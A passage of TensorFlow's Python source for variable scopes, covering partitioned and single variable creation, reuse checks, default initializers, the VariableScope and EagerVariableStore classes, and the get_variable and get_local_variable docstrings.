use when doing asynchronous distributed training.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any([p < 1 for p in partitions]):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
num_slices_with_excess = shape[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
# pylint: disable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
# pylint: enable=protected-access
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
tb = self._vars[name].op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope? "
"Originally defined at:\n\n%s" % (
name, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
if shape and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
elif not tf_inspect.getargspec(initializer).args:
init_val = initializer
else:
raise ValueError("You can only pass an initializer function that "
"expects no arguments to its callable when the "
"shape is not fully defined. The given initializer "
"function expects the following args %s" %
tf_inspect.getargspec(initializer).args)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
if self._partitioner is not None:
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
if partitioner and context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=self.reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
print(container.variables()) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
